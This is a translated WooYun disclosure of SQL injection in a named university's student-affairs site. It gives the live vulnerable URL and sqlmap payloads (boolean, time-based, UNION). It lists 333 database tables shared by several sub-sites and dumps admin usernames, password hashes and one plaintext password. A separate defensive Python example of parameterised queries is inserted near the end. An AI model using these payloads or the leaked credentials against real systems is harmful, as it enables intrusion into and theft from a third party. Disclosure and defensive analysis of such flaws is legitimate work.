
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0125477

Title: SQL injection on a site of South-Central University for Nationalities (leaks data of several other websites on the same server)

Vendor: South-Central University for Nationalities

Author: Zephyrus

Submitted: 2015-07-11 20:06

Fixed: 2015-07-16 20:08

Published: 2015-07-16 20:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner (CCERT, the education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-07-11: details sent to the vendor, awaiting vendor handling
2015-07-16: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Had nothing to do, so I took a look at what this university was like, and while browsing one of its sub-sites I found a vulnerability. Occupational disease: I want to test every website I visit...
Note: I searched specifically, and the vulnerability on this site has not been submitted before. The main domain may be the same as in some earlier reports (WooYun-2014-79140, WooYun-2015-101434), but the vulnerability and the database are different >_<

Detailed description:

Vulnerable site:

http://www1.scuec.edu.cn/stu/xyh2010/view.php?id=71


Injection in the id parameter:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=71 AND 3911=3911
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=71 AND (SELECT * FROM (SELECT(SLEEP(5)))CMkP)
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: id=-4072 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786b6b71,0x5566576b574852766b49,0x716b717171),NULL,NULL,NULL,NULL,NULL,NULL--
---
[19:25:13] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: PHP 5.2.6, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.12


Databases:

available databases [2]:
[*] information_schema
[*] stu


On inspection, the stu database contains 333 tables; they are not all listed here:

+----------------------------+
| admin |
| any_admin |
| any_attachment |
| any_categories |
| any_comments |
| any_essay |
| any_info |
| any_live |
| any_log |
| any_role |
| any_user |
| article |
| article_replys |
| biaobing_admin |
| biaobing_message |
| biaobing_news |
| biaobing_stu |
| c2c_admin |
| c2c_ask |
| c2c_content |
| c2c_kind |
| c2c_liuyan |
| c2c_love |
| c2c_notice |
| c2c_user |
| dede_addonarticle |
| dede_addonimages |
| dede_addoninfos |
| dede_addonshop |
| dede_addonsoft |
| dede_addonspec |
| dede_admin |
| dede_admintype |
| dede_advancedsearch |
...
| yxbj_admin |
| yxbj_ads |
| yxbj_ads_place |
| yxbj_announce |
| yxbj_attachment |
| yxbj_author |
| yxbj_banip |
| yxbj_category |
| yxbj_channel |
| yxbj_city |
| yxbj_comment |
| yxbj_copyfrom |
| yxbj_field |
| yxbj_guestbook |
| yxbj_keylink |
| yxbj_keywords |
| yxbj_log |
| yxbj_member |
| yxbj_member_group |
| yxbj_member_info |
| yxbj_menu |
| yxbj_module |
| yxbj_mytag |
| yxbj_position |
| yxbj_province |
| yxbj_reword |
| yxbj_special |
| yxbj_type |
| zuec_sort |
| zuec_user |
+----------------------------+


Now the key point: the table prefixes are very regular. The developers were probably lazy and put every site into the same database, which is no laughing matter.



Then I did some Google hacking:
The data held in the stu database belongs to the following websites:

South-Central University for Nationalities Student Financial Aid site http://www1.scuec.edu.cn/stu/xszz/
South-Central University for Nationalities Student Role Models special site http://www1.scuec.edu.cn/stu/biaobing/
Student Affairs Department http://www1.scuec.edu.cn/stu/affairs/
〒_〒 These should all be sub-sites of the university's Student Affairs Online portal; okay, I will not list them all.


User data of this site:

Database: stu
Table: admin
[4 entries]
+----+-----------+----------------------------------+
| id | user_name | user_pwd |
+----+-----------+----------------------------------+
| 1 | mixmore | 577559799b00356fb2bd186f5ca3e156 |
| 0 | mixmore | 577559799b00356fb2bd186f5ca3e156 |
| 2 | mixmore | 577559799b00356fb2bd186f5ca3e156 |
| 3 | mix | mix |
+----+-----------+----------------------------------+


I did not go any further...>_<

Proof of vulnerability:


The stu database has 333 tables spanning multiple sub-sites.
One of its user tables is the admin table dumped in the detailed description above:

Fix recommendation:

Keep the databases of different websites separate.

Copyright notice: please credit Zephyrus@WooYun when reposting
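Separating the databases limits the blast radius, but the injection itself comes from building the view.php query out of the raw id parameter. As an added example that is not the report's or the site's own code, the following Python stand-in (sqlite3 instead of MySQL, with a constructed "article" table) contrasts string concatenation with a validated, bound parameter, using the boolean-based probe from the sqlmap output above.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the stu database: a small 'article' table
    that view.php?id=<n> would look a row up in (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO article VALUES (?, ?)",
        [(70, "notice 70"), (71, "notice 71"), (72, "notice 72")],
    )
    return conn


def view_vulnerable(conn, id_param: str):
    """Concatenation: the request parameter becomes part of the SQL text,
    so any condition appended to it is evaluated by the database."""
    sql = "SELECT id, title FROM article WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def view_fixed(conn, id_param: str):
    """Validate the expected type first, then bind the value as a parameter
    so the database never parses attacker-controlled text as SQL."""
    if not id_param.isdigit():
        return []  # anything that is not a plain non-negative integer is rejected
    return conn.execute(
        "SELECT id, title FROM article WHERE id=?", (int(id_param),)
    ).fetchall()


def demo():
    conn = make_db()
    # A true appended condition keeps the row...
    true_probe = view_vulnerable(conn, "71 AND 3911=3911")
    # ...a false one drops it: that difference is the blind-injection oracle.
    false_probe = view_vulnerable(conn, "71 AND 3911=3912")
    # The fixed handler refuses the probe and only serves a genuine integer id.
    rejected = view_fixed(conn, "71 AND 3911=3911")
    legit = view_fixed(conn, "71")
    return len(true_probe), len(false_probe), len(rejected), legit


if __name__ == "__main__":
    print(demo())  # (1, 0, 0, [(71, 'notice 71')])
```

The same validate-then-bind pattern applies in PHP with mysqli or PDO prepared statements; a dedicated low-privilege database account per site then keeps a remaining bug in one sub-site from exposing the others.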


Vendor response

Vendor response:

Severity: no impact, ignored by vendor

Ignored on: 2015-07-16 20:08

Vendor reply:

Latest status:

None